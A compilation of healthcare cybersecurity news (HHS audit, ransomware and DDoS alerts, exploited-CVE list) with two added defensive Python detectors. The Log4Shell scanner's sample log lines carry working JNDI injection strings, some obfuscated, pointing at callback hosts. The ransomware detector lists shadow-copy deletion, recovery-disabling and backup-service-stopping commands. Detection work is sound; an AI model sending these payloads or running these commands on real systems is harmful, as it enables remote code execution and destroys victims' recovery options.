Healthcare Cybersecurity

HHS Information Security Program Rated ‘Not Effective’

An audit of the Department of Health and Human Services (HHS), conducted for the HHS’ Office of Inspector General (OIG) to assess compliance with the Federal Information Security Modernization Act of 2014 (FISMA) in fiscal year 2021, has rated the agency’s information security program ‘not effective’, the same rating it received in fiscal years 2018, 2019, and 2020. The audit covered five of the HHS’ 12 operating divisions; OIG did not state which five were audited.

HHS Information Security Program Maturity Levels. Source: HHS’ OIG

In order to receive an effective rating, the HHS is required to reach the ‘Managed and Measurable’ maturity level for the Identify, Protect, Detect, Respond, and Recover function areas, as required by DHS guidance and the FY 2021 Inspector General FISMA Reporting Metrics.

OIG said in the report that the HHS has continued to make changes to strengthen the maturity of its enterprise-wide cybersecurity program and is making progress to sustain cybersecurity across all FISMA domains. The HHS security program strengthened the maturity of controls for several individual FISMA metrics, although progress in some areas has not been made due to the lack of full implementation of Information Security Continuous Monitoring (ISCM) efforts across its operating divisions. This is critical as reliable data and metrics are required to make informed risk management decisions.

The HHS has partially implemented its Continuous Diagnostics and Mitigation (CDM) strategy, which has improved visibility into some assets, and awareness of vulnerabilities and threat information has improved through the use of RSA Archer and Splunk. Progress has been made toward implementing a full department-wide CDM program to ensure continuous monitoring of HHS networks and systems, provide real-time reporting of operating divisions’ status and progress to address and implement strategies to combat risk, prioritize issues using established risk criteria, and improve its cybersecurity response capabilities.

The HHS has advanced its implementation of CDM tools and processes but has no definitive schedule for fully implementing the CDM program across all operating divisions. Until the CDM strategy is fully implemented, the HHS may be unable to identify cybersecurity risks on an ongoing basis, prioritize remediation efforts by potential impact, and mitigate the most significant vulnerabilities first.

OIG has made several recommendations for improving the maturity of the HHS information security program. The HHS should continue with its implementation of an automated CDM solution to provide a centralized, enterprise-wide view of risks across all of HHS. The ISCM strategy needs to be updated to include a more specific roadmap, with target dates for ISCM deployment across all HHS operating divisions. An enterprise risk assessment of known control weaknesses should be performed and an appropriate risk response documented, and the HHS needs to develop a process for monitoring information system contingency plans to ensure they are developed, maintained, and integrated with the organization’s other continuity requirements. The HHS concurred with all OIG recommendations.

The post HHS Information Security Program Rated ‘Not Effective’ appeared first on HIPAA Journal.

Operational Continuity-Cyber Incident Checklist Published by HSCC

The Health Sector Coordinating Council’s (HSCC) Cybersecurity Working Group (CWG) has published an Operational Continuity-Cyber Incident (OCCI) checklist which serves as a flexible template for responding to and recovering from serious cyberattacks that cause extended system outages, such as ransomware attacks.

Ransomware attacks on healthcare organizations increased significantly during the pandemic and continue at elevated levels. Ransomware threat actors steal sensitive data that commands a high price on the black market and threaten to publish it to pressure victims into paying, while the extended system outages caused by the attacks inflict considerable financial losses, which increases the probability of the ransom being paid. The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have recently issued warnings about ransomware groups actively targeting critical infrastructure, including healthcare organizations.

In addition to cybercriminal groups, hospitals are a target for nation-state threat actors. The Five Eyes cybersecurity agencies recently warned of an elevated threat of cyberattacks on critical infrastructure in retaliation for the sanctions imposed on Russia by the United States. There is also a risk that healthcare organizations will become collateral victims of cyberattacks directed at organizations in Ukraine, as happened with the NotPetya wiper malware in 2017. Development and release of the checklist were accelerated in light of the rising geopolitical tensions from the Russia-Ukraine conflict and the increased threat to healthcare organizations in the United States.

Due to the high risk of attacks, healthcare organizations need to prepare for attacks and ensure that the business can continue to operate should it not be possible to immediately restore access to critical systems. Having an incident response plan that can be immediately implemented will help to minimize the damage caused and the impact on patients and medical services.

The OCCI toolkit includes a checklist of the steps that should be taken during the first 12 hours after a security incident occurs and outlines actions and considerations for the duration of cybersecurity incidents. The checklist is broken down into role-based modules that align with the Incident Command System but can be refined or modified to match the size, resources, complexity, and capabilities of different organizations, from small physician practices up to large hospitals and health systems.

An incident commander should be appointed to provide overall strategic direction on all response actions and activities, a medical-technical specialist should advise the Incident Commander on issues related to the response, and a public information officer is required to communicate with internal and external stakeholders, site personnel, patients and their families, and the media. The checklist also provides a list of steps that need to be completed by the safety officer and section chiefs. For smaller organizations, those roles may need to be combined to suit their organizational structures.

The checklist was created from input provided by leading health sector cybersecurity and emergency management executives that participate in the HSCC Incident Response/Business Continuity (IRBC) Task Group.

WEDI Makes Healthcare-Specific Recommendations for Improving the NIST Cybersecurity Framework

The Workgroup for Electronic Data Interchange (WEDI) has responded to the request for information from the National Institute of Standards and Technology (NIST) and has made several recommendations for improving the NIST cybersecurity framework and supply chain risk management guidance to help healthcare organizations deal with some of the most pressing threats facing the sector.

Ransomware is one of the main threats facing the healthcare industry, and that is unlikely to change in the short to medium term. To help healthcare organizations deal with the threat, WEDI has suggested that NIST increase its focus on ransomware and address it directly in the cybersecurity framework. NIST published a new ransomware resource in February 2022 containing valuable information on protecting against, detecting, responding to, and recovering from ransomware attacks, and WEDI feels that incorporating ransomware into the cybersecurity framework would expand the reach and impact of that resource.

WEDI has also recommended including specific case studies of healthcare organizations that have experienced a ransomware attack, updating the framework to define contingency planning strategies based on the type of healthcare organization, and issuing guidance focused on contingency planning, execution, and recovery. Ransomware attacks on healthcare providers carry risks that do not apply to other entities, so further guidance in this area would be of great benefit to providers and could help minimize disruption and patient safety issues.

Healthcare organizations have been developing patient access Application Programming Interfaces (APIs) and applications (apps). These are covered by HIPAA and must therefore incorporate safeguards to protect the privacy and security of the healthcare data they handle, but WEDI has drawn attention to the lack of robust privacy standards for third-party health apps that fall outside HIPAA. WEDI says a national framework is needed to ensure that healthcare data obtained by third-party apps is held to appropriate privacy and security standards.

The number of risks and vulnerabilities affecting portable and implantable medical devices has grown rapidly in recent years and is likely to keep growing. WEDI has recommended that NIST address cybersecurity issues related to these devices directly in the cybersecurity framework, and also address insider threats. Many healthcare data breaches have an insider element, such as lost electronic devices and employees falling for phishing and social engineering attacks, and WEDI suggests these issues, along with security awareness training, should be addressed in the framework.

WEDI has also recommended NIST develop a version of its cybersecurity framework that is targeted at smaller healthcare organizations, which do not have the resources available to stay informed about the latest security developments and implement the latest security measures and protocols. A version of the framework that is more focused on the threats faced by smaller organizations would be of great benefit and should include realistic proactive steps that can be taken by small healthcare organizations to mitigate risks.

15 Most Exploited Vulnerabilities in 2021

The Five Eyes security agencies, an alliance of intelligence agencies from Australia, Canada, New Zealand, the United Kingdom, and the United States, have issued a joint advisory about the 15 vulnerabilities in software and operating systems that were most commonly targeted by nation-state hackers and cybercriminal organizations in 2021.

Throughout 2021, malicious cyber actors targeted newly disclosed critical software vulnerabilities in attacks on public and private sector organizations across a wide range of industry sectors. 11 of the 15 most routinely exploited vulnerabilities were publicly disclosed in 2021; the remaining four date from 2018 to 2020, showing that older vulnerabilities continue to be exploited. The list comprises nine remote code execution vulnerabilities, two elevation of privilege flaws, and one each of security feature bypass, path traversal, arbitrary file reading, and arbitrary code execution.

Top of the list was the maximum severity Log4Shell vulnerability in the Apache Log4j open source logging framework. The vulnerability – CVE-2021-44228 – can be remotely exploited by a threat actor allowing the execution of arbitrary code, which would give the attacker full control of a vulnerable system. The vulnerability was only disclosed publicly in December 2021, yet still ranked first as the most commonly exploited vulnerability, demonstrating how hackers can quickly weaponize and exploit vulnerabilities before organizations can patch. The flaw was rated one of the most serious vulnerabilities to be discovered in the past decade.
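The following is an added example, not code from the advisory or from HIPAA Journal: a small scanner that flags Log4Shell exploitation attempts in web-server access logs. Exploitation depends on Log4j evaluating a `${jndi:...}` lookup found in logged input, and attackers routinely hide that string behind Log4j’s own nested lookups (`${lower:j}`, `${upper:n}`, and the `${key:-default}` default-value form), so the scanner resolves those forms before matching and then extracts the protocol and callback host so they can be blocked and hunted for. The log lines are constructed for the example, and the set of obfuscation forms handled is an assumption (the common ones), not an exhaustive list.

```python
import re
from dataclasses import dataclass

# Innermost ${...} lookup, i.e. one with no nested "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalisation: ${jndi:<protocol>:<host>...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/\s}]+)", re.IGNORECASE)


def _resolve(m):
    """Resolve one innermost lookup the way Log4j 2 would, for the forms
    attackers use to hide 'jndi' (assumption: lower/upper/default-value only)."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    # ${anything:-default} evaluates to the default when the key is unknown,
    # so ${::-j} and ${env:NOPE:-j} both become "j".
    if ":-" in body and not low.startswith("jndi:"):
        return body.split(":-", 1)[1]
    return m.group(0)  # leave unresolved lookups (including ${jndi:...}) in place


def normalize(text, max_rounds=32):
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


@dataclass(frozen=True)
class Hit:
    line_no: int
    protocol: str   # ldap, rmi, dns, ...
    host: str       # callback host[:port] to block and hunt for
    raw: str


def scan_lines(lines):
    """Return one Hit per line that contains a (possibly obfuscated) JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append(Hit(n, m.group(1).lower(), m.group(2), line))
    return hits


# Constructed access-log lines (abbreviated Combined Log Format); not real traffic.
SAMPLE_LOG = [
    '10.0.0.7 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.9:1389/Exploit}"',
    '203.0.113.9 - - "GET /?q=${${lower:j}${upper:n}di:ldap://203.0.113.9/a} HTTP/1.1" 404 "-" "-"',
    '198.51.100.4 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://198.51.100.4:1099/x}"',
    '198.51.100.4 - - "GET / HTTP/1.1" 200 "-" "${jndi:${lower:d}${lower:n}${lower:s}://probe.example}"',
    '10.0.0.8 - - "GET /status HTTP/1.1" 200 "-" "curl/7.81.0 ${env:HOSTNAME}"',
]

if __name__ == "__main__":
    for h in scan_lines(SAMPLE_LOG):
        print(f"line {h.line_no}: jndi via {h.protocol} -> {h.host}")
```

Running the block on the constructed lines reports lines 2 to 5 and leaves the benign `${env:HOSTNAME}` line alone; note that a lookup in any logged field (User-Agent, query string, X-Forwarded-For) is equally dangerous, which is why the whole line is normalised rather than a single field.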

CVE             Name        Vendor and Product                            Type
CVE-2021-44228  Log4Shell   Apache Log4j                                  Remote code execution (RCE)
CVE-2021-40539              Zoho ManageEngine AD SelfService Plus         RCE
CVE-2021-34523  ProxyShell  Microsoft Exchange Server                     Elevation of privilege
CVE-2021-34473  ProxyShell  Microsoft Exchange Server                     RCE
CVE-2021-31207  ProxyShell  Microsoft Exchange Server                     Security feature bypass
CVE-2021-27065  ProxyLogon  Microsoft Exchange Server                     RCE
CVE-2021-26858  ProxyLogon  Microsoft Exchange Server                     RCE
CVE-2021-26857  ProxyLogon  Microsoft Exchange Server                     RCE
CVE-2021-26855  ProxyLogon  Microsoft Exchange Server                     RCE
CVE-2021-26084              Atlassian Confluence Server and Data Center   Arbitrary code execution
CVE-2021-21972              VMware vSphere Client                         RCE
CVE-2020-1472   ZeroLogon   Microsoft Netlogon Remote Protocol (MS-NRPC)  Elevation of privilege
CVE-2020-0688               Microsoft Exchange Server                     RCE
CVE-2019-11510              Pulse Secure Pulse Connect Secure             Arbitrary file reading
CVE-2018-13379              Fortinet FortiOS and FortiProxy               Path traversal

The remote code execution vulnerability in Zoho ManageEngine AD SelfService Plus – CVE-2021-40539 – has a 9.8 CVSS severity rating and was the second most exploited vulnerability, with attacks exploiting the vulnerability continuing in 2022. The flaw can be exploited remotely and allows web shells to be implanted in a network, allowing the attacker to compromise credentials, move laterally, and exfiltrate sensitive data.

The ProxyLogon flaws in Microsoft Exchange Server were also extensively exploited. These flaws – CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065 – allow remote attackers to execute arbitrary code on vulnerable Exchange servers and gain access to files and mailboxes on the servers, along with any credentials stored on them.

Three ProxyShell vulnerabilities made the top 15 list. These vulnerabilities – CVE-2021-34523, CVE-2021-34473, CVE-2021-31207 – can be exploited on Microsoft Exchange email servers that have the Microsoft Client Access Service (CAS) exposed to the Internet. This is a common configuration that allows users to access their emails on their mobile devices and via web browsers. The flaws can be exploited to remotely execute arbitrary code on vulnerable servers.

In many cases, vulnerabilities were exploited within two weeks of public disclosure. For most of the top exploited vulnerabilities, researchers or other actors published proof-of-concept exploit code within that two-week window, which allowed a much broader range of threat actors to exploit the flaws before organizations had time to patch.

A further 21 vulnerabilities that are also routinely exploited are listed, including many from 2021 and some dating back to 2017. Applying the vendor patches promptly closes these vulnerabilities, and the Five Eyes agencies have also included a list of mitigations that make it harder for threat actors to exploit these and other vulnerabilities.

Five Eyes Agencies Warn Critical Infrastructure Orgs About Threat of Russian State-Sponsored and Criminal Cyberattacks

The Five Eyes cybersecurity agencies have recently issued a joint security alert warning of the threat of cyberattacks on critical infrastructure by Russian state-sponsored threat actors and pro-Russia cybercriminal groups.

Intelligence gathered by the agencies indicates the Russian government has been exploring opportunities for conducting cyberattacks against targets in the West in retaliation for the sanctions imposed on Russia and the support being provided to Ukraine. The agencies warn that Russian state-sponsored hacking groups have been conducting Distributed Denial of Service (DDoS) attacks in Ukraine and are known to have used destructive malware in Ukraine on government and critical infrastructure organizations. These hacking groups are highly skilled, can gain access to IT networks, maintain persistence, exfiltrate sensitive data, and can cause major disruption to critical systems, including industrial control systems.

The alert names several Russian government and military organizations that have engaged in these malicious activities, including the Russian Federal Security Service (FSB), Russian Foreign Intelligence Service (SVR), Russian General Staff Main Intelligence Directorate (GRU), and the Russian Ministry of Defense, Central Scientific Institute of Chemistry and Mechanics (TsNIIKhM).

The FSB is known to have conducted cyber operations against the energy sector, including companies in the US and UK, as well as private sector organizations, cybersecurity companies, and others, and has engaged cybercriminal hackers and tasked them with espionage-focused activities. The SVR has conducted targeted attacks on critical infrastructure organizations and is known for sophisticated, stealthy intrusion tradecraft. The GRU has targeted a range of critical infrastructure organizations, and TsNIIKhM has a history of attacks on foreign companies and government organizations.

Several cybercriminal groups have publicly voiced support for Russia and have threatened to attack organizations perceived to have conducted cyber offensives against the Russian government or the Russian people. These groups are thought to pose a threat to all critical infrastructure organizations, including healthcare; their activity consists primarily of DDoS attacks, extortion, and ransomware.

The cybersecurity agencies have urged all critical infrastructure entities to take steps to prepare for and mitigate cyberattacks. The alert provides detailed information on threat actors and state-sponsored hacking groups of concern and recommendations for preparing for and mitigating cyber threats.

2021 Saw Record Numbers of DDoS Attacks on the Healthcare Industry

A new report from Comcast Business indicates 2021 was another record-breaking year for Distributed Denial of Service (DDoS) attacks: 9.84 million attacks were reported in 2021, a 14% increase from 2019, although slightly fewer than the 10.1 million reported in 2020.

The slight decline was due to several factors. 2020 was a particularly bad year: it was a full lockdown year in which employees worked remotely and students learned from home, giving attackers a unique landscape against which to launch an unprecedented number of DDoS attacks. In 2021, high cryptocurrency prices led many threat actors to divert their botnets from DDoS attacks to mining cryptocurrency.

DDoS attackers spared no one in 2021; however, 73% of attacks were conducted on just four sectors – healthcare, government, finance, and education. Attackers followed seasonal trends and activities throughout the year, with education being attacked to coincide with the school year, and COVID-19 and vaccine availability drove DDoS attacks on the healthcare industry.

Multi-vector attacks increased by 47% in 2021. Comcast Business DDoS Mitigation Services defended customers against 24,845 multi-vector attacks that targeted layers 3, 4, and 7 (network, transport, and application) simultaneously. 69% of Comcast Business customers were targeted by DDoS attacks in 2021, a 41% increase from 2020, and 55% experienced multi-vector attacks on layers 3, 4, and 7 simultaneously. The number of vectors used in multi-vector attacks also rose sharply, from 5 in 2020 to 15 in 2021, and the number of amplification protocols used increased from 3 to 9.

DDoS attacks flood victims’ networks with traffic to render them unusable, and while attacks are often conducted just for that reason, it is common for DDoS attacks to be conducted to distract organizations and consume resources while the attackers engage in other nefarious activities. There is a strong link between DDoS attacks and data breaches. According to a Neustar survey, almost half of organizations (47%) that suffered a DDoS attack discovered a virus on their networks after the attack, 44% said malware was activated, 33% reported a network breach, 32% reported customer data theft, 15% suffered a ransomware attack, and 11% were victims of financial theft.

The most severe attack in 2021 was a 242 Gbps DDoS attack, enough to saturate even high-bandwidth Ethernet Dedicated Internet (EDI) circuits within minutes. The magnitude of attacks has increased, but a trend has also been identified where threat actors conduct low-volume attacks to stay under the radar of IT teams while causing damage on multiple levels. Such attacks degrade website performance yet often go undetected, with IT teams only discovering they have been targeted when customer complaints start arriving.

DDoS attacks are cheap to perform, costing just a few dollars, although for a few hundred dollars massive attacks can be conducted that can cripple businesses. DDoS attacks can be incredibly costly for businesses. The attacks can prevent businesses from reaching their customers and meeting SLAs, and the attacks can result in devastating financial and reputational damage. In some cases, the damage is so severe that businesses have been forced to permanently close. For businesses that depend on availability, every minute of downtime can cause hundreds of thousands or even millions of dollars in losses.

“Even if you are a small business and think you are at a lower risk, you could be in the supply chain for a larger organization,” Comcast Business explained in the report. “You can be sure that your business partners are watching their threat risk factors and are increasingly concerned about doing business with companies that are not.”

FBI Issues Warning About BlackCat Ransomware Operation

The Federal Bureau of Investigation (FBI) has issued a TLP:WHITE flash alert about the BlackCat ransomware-as-a-service (RaaS) operation. BlackCat, also known as ALPHV, launched in November 2021, shortly after the shutdown of the BlackMatter ransomware operation, itself a rebrand of DarkSide, the operation behind the ransomware attack on Colonial Pipeline. A member of the operation has claimed they are a former BlackMatter/DarkSide affiliate who branched out on their own; however, it is more likely that BlackCat is a rebrand of BlackMatter/DarkSide.

The FBI said many of the developers and money launderers involved with the BlackCat operation have been linked to DarkSide/BlackMatter, which indicates they have extensive networks and considerable experience with running RaaS operations. The BlackCat RaaS operation has not been active for long, but the group has already claimed at least 60 victims worldwide. BlackCat typically targets large organizations and demands ransom payments of several million dollars in Bitcoin or Monero, although the group does appear willing to negotiate payments with victims.

Unusually for ransomware, BlackCat is written in Rust, a memory-safe language that also offers good performance and concurrency. Initial access to networks is usually gained using previously compromised credentials; once inside, the attackers compromise Active Directory user and administrator accounts. The ransomware executable is highly customizable, allowing attacks on a wide range of corporate environments; it supports multiple encryption methods and can disable security features on victim networks.

The group uses Windows Task Scheduler to configure malicious Group Policy Objects (GPOs) to deploy the ransomware, initially using PowerShell scripts and Cobalt Strike. Windows administrative tools and Microsoft Sysinternals tools are also used during compromise. Prior to encrypting files, victim data is stolen, including from cloud providers. Threats are then issued to publish the stolen data on the leak site if the ransom is not paid. In the flash alert, the FBI has shared indicators of compromise (IoCs) and mitigation measures that should be adopted to improve security and make it harder for attacks to succeed.

As with all ransomware attacks, the FBI recommends not paying the ransom: there is no guarantee that files will be recovered, payment does not prevent further attacks, and there is no guarantee that data stolen in the attack will not be published or otherwise misused. However, the FBI accepts that paying the ransom may be the only option in some cases to protect customers, patients, employees, and shareholders.

Regardless of whether or not the ransom is paid, the FBI has requested victims report attacks to their local FBI field office. The FBI has requested IP logs showing callbacks from foreign IP addresses, Bitcoin or Monero addresses and transaction IDs, communications with the threat actors, the decryptor file, and/or a benign sample of an encrypted file.

HHS Issues Warning to HPH Sector about Hive Ransomware

The HHS’ Health Sector Cybersecurity Coordination Center (HC3), part of the Office of Information Security, has issued a TLP:WHITE alert about the Hive ransomware group, a particularly aggressive cybercriminal operation that has extensively targeted the healthcare sector in the United States.

HC3 has shared an analysis of the tactics, techniques, and procedures (TTPs) known to be used by the group in their attacks and has shared cybersecurity principles and mitigations that can be adopted to improve resilience against Hive ransomware attacks.

The Hive ransomware group has been conducting attacks since at least June 2021. The group is known for using double extortion tactics, where sensitive data is exfiltrated prior to file encryption and threats are issued to publish the data if the ransom is not paid. The group is also known to contact victims by phone to pressure them into paying the ransom.

Hive is a ransomware-as-a-service (RaaS) operation: affiliates are recruited to conduct attacks on the gang’s behalf in exchange for a cut of the profits, which lets the core members of the group concentrate on development and operations.

Having affiliates with different specialties means a variety of TTPs are used to gain initial access; however, the group most commonly uses phishing emails, Remote Desktop Protocol (RDP), and VPN compromise. Once inside a network, the attackers search compromised systems for applications and processes involved in backing up data and terminate or disrupt them. Shadow copies, backup files, and system snapshots are also deleted to make it harder for victims to recover without paying the ransom.
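Added example, not code from the HC3 alert: a correlation check over process-creation telemetry for the backup-inhibition behaviour described above. A lone `vssadmin delete shadows` is sometimes legitimate administration, so this rule only raises an alert when two or more distinct inhibition indicators appear on the same host within a short window. The events are constructed; the command-line patterns are generic ransomware tradecraft (MITRE ATT&CK T1490, Inhibit System Recovery) rather than Hive-specific indicators from the alert, and the ten-minute window and two-indicator threshold are assumptions to be tuned per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command-line patterns for backup/recovery inhibition. Assumption: generic
# T1490 tradecraft, not indicators taken from the HC3 alert.
INDICATORS = {
    "vss_delete": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "vss_resize": re.compile(r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b", re.I),
    "wmic_shadow": re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I),
    "bcdedit_recovery": re.compile(
        r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I),
    "wbadmin_catalog": re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog\b", re.I),
    # Stopping or killing backup-related services/processes (Veeam, VSS, SQL, ...).
    "backup_svc_stop": re.compile(
        r"\b(net1?|sc)(\.exe)?\s+stop\s+\"?[^\"\s]*(veeam|backup|vss|sql)", re.I),
    "backup_proc_kill": re.compile(
        r"\btaskkill(\.exe)?\b.*/im\s+\S*(veeam|backup|sql)", re.I),
}


def match_indicators(cmdline):
    """Names of every indicator pattern present in one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def correlate(events, window=timedelta(minutes=10), min_distinct=2):
    """Raise one alert per host when >= min_distinct indicator kinds occur within `window`."""
    per_host = defaultdict(list)
    for ev in events:
        kinds = match_indicators(ev["cmd"])
        if kinds:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), kinds))
    alerts = []
    for host, items in per_host.items():
        items.sort(key=lambda it: it[0])
        for i, (start, _) in enumerate(items):
            seen = set()
            for ts, kinds in items[i:]:
                if ts - start > window:
                    break
                seen.update(kinds)
            if len(seen) >= min_distinct:
                alerts.append({"host": host, "start": start.isoformat(),
                               "indicators": sorted(seen)})
                break  # one alert per host is enough for triage
    return alerts


# Constructed process-creation events (Sysmon event 1 style); not real telemetry.
EVENTS = [
    {"ts": "2022-04-10T02:14:05", "host": "FILESRV01", "user": "CORP\\svc_backup",
     "cmd": r"C:\Windows\System32\vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2022-04-10T02:14:09", "host": "FILESRV01", "user": "CORP\\svc_backup",
     "cmd": r"wmic shadowcopy delete"},
    {"ts": "2022-04-10T02:14:30", "host": "FILESRV01", "user": "CORP\\svc_backup",
     "cmd": r"bcdedit.exe /set {default} recoveryenabled no"},
    {"ts": "2022-04-10T02:15:02", "host": "FILESRV01", "user": "CORP\\svc_backup",
     "cmd": r"net stop VeeamBackupSvc"},
    # Routine administration on other hosts: must not alert at the default threshold.
    {"ts": "2022-04-10T09:31:12", "host": "WKS-042", "user": "CORP\\helpdesk",
     "cmd": r"vssadmin.exe list shadows"},
    {"ts": "2022-04-10T03:00:00", "host": "BACKUP01", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": r"wbadmin start backup -backupTarget:E: -include:C: -quiet"},
    {"ts": "2022-04-10T11:02:44", "host": "WKS-017", "user": "CORP\\jsmith",
     "cmd": r"vssadmin delete shadows /for=C: /oldest"},
]

if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(f"{a['host']} @ {a['start']}: {', '.join(a['indicators'])}")
```

On the constructed events only FILESRV01 alerts, with four distinct indicators inside one minute; the single shadow-copy deletion on WKS-017 is recorded but not escalated unless the threshold is lowered to one. In practice the alert should also fire a backup-integrity check, since by the time these commands run the actor is usually minutes away from encryption.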

The ransomware is actively developed. Several features and practices have been adopted to hinder analysis of the malware and to prevent interception and monitoring of negotiations with victims, and the group has adopted a new IPv4 obfuscation technique, dubbed IPfuscation, to make its attacks stealthier.

Defending against Hive ransomware attacks requires standard cybersecurity best practices to be followed, including the following:

  • Changing default passwords and setting strong passwords
  • Implementing 2-factor authentication, especially for remote access services
  • Providing regular security awareness training to the workforce
  • Creating multiple copies of backups, testing those backups, and storing backups offline
  • Ensuring there is continuous monitoring, supported by a constant input of threat data
  • Implementing a comprehensive vulnerability management program and prioritizing known exploited vulnerabilities
  • Ensuring software and operating systems are kept up to date
  • Implementing comprehensive endpoint security solutions that are automatically updated with the latest signatures/updates.

Microsoft Sinkholes Notorious ZLoader Botnet

The notorious cybercrime ZLoader botnet, which was used to deliver Ryuk ransomware in attacks on healthcare providers, has been disabled by Microsoft’s Digital Crimes Unit (DCU). Microsoft recently obtained a court order from the United States District Court for the Northern District of Georgia authorizing the seizure of 65 hard-coded domains used by the ZLoader botnet for command-and-control communications. Those domains have now been sinkholed, preventing the operator of the botnet from communicating with devices infected with ZLoader malware.

ZLoader malware included a domain generation algorithm (DGA) which is triggered if communication with the hard-coded domains is not possible, which serves as a failsafe against any takedown efforts. The court order also allowed Microsoft to seize 319 DGA-registered domains. Microsoft is working to block the registration of any future DGA domains.

ZLoader belongs to a family of malware variants descended from the ZeuS banking Trojan. Initially, ZeuS was used for credential and financial theft, with the aim of transferring money out of victims’ financial accounts. The threat actor behind the malware later established a malware-as-a-service operation that delivered malware and ransomware, such as Ryuk, on behalf of other threat actors.

Ryuk ransomware has been extensively used in attacks on the healthcare industry since its emergence in 2018, and ZLoader was one of the ways the ransomware was delivered. ZLoader is capable of disabling a popular antivirus solution to evade detection, and the malware has been installed on thousands of devices, many of which are in education and healthcare.

The takedown of the botnet is significant; however, the operators of the botnet are likely already working to set up new command and control infrastructure. Microsoft said the takedown has been a success and resulted in the temporary disabling of the ZLoader infrastructure, which has made it more difficult for the organized criminal gang to continue with its malicious activities.

“We referred this case to law enforcement, who are tracking this activity closely and will continue to work with our partners to monitor the behavior of these cybercriminals. We will work with internet service providers to identify and remediate victims,” said Microsoft. Microsoft also confirmed that it is prepared to take further legal action and implement technical measures to deal with ZLoader and other botnets.

Microsoft also named an individual who is believed to be responsible for developing a component of the malware that was used for delivering ransomware – Denis Malikov, who resides in Simferopol on the Crimean Peninsula. “We chose to name an individual in connection with this case to make clear that cybercriminals will not be allowed to hide behind the anonymity of the internet to commit their crimes.”

Microsoft said its investigation of the ZLoader operation was assisted by the cybersecurity firm ESET, Palo Alto Networks’ Unit 42 team, and Black Lotus Labs, with additional insights from the Financial Services Information Sharing and Analysis Center (FS-ISAC), the Health Information Sharing and Analysis Center (H-ISAC), the Microsoft Threat Intelligence Center, and the Microsoft Defender team.
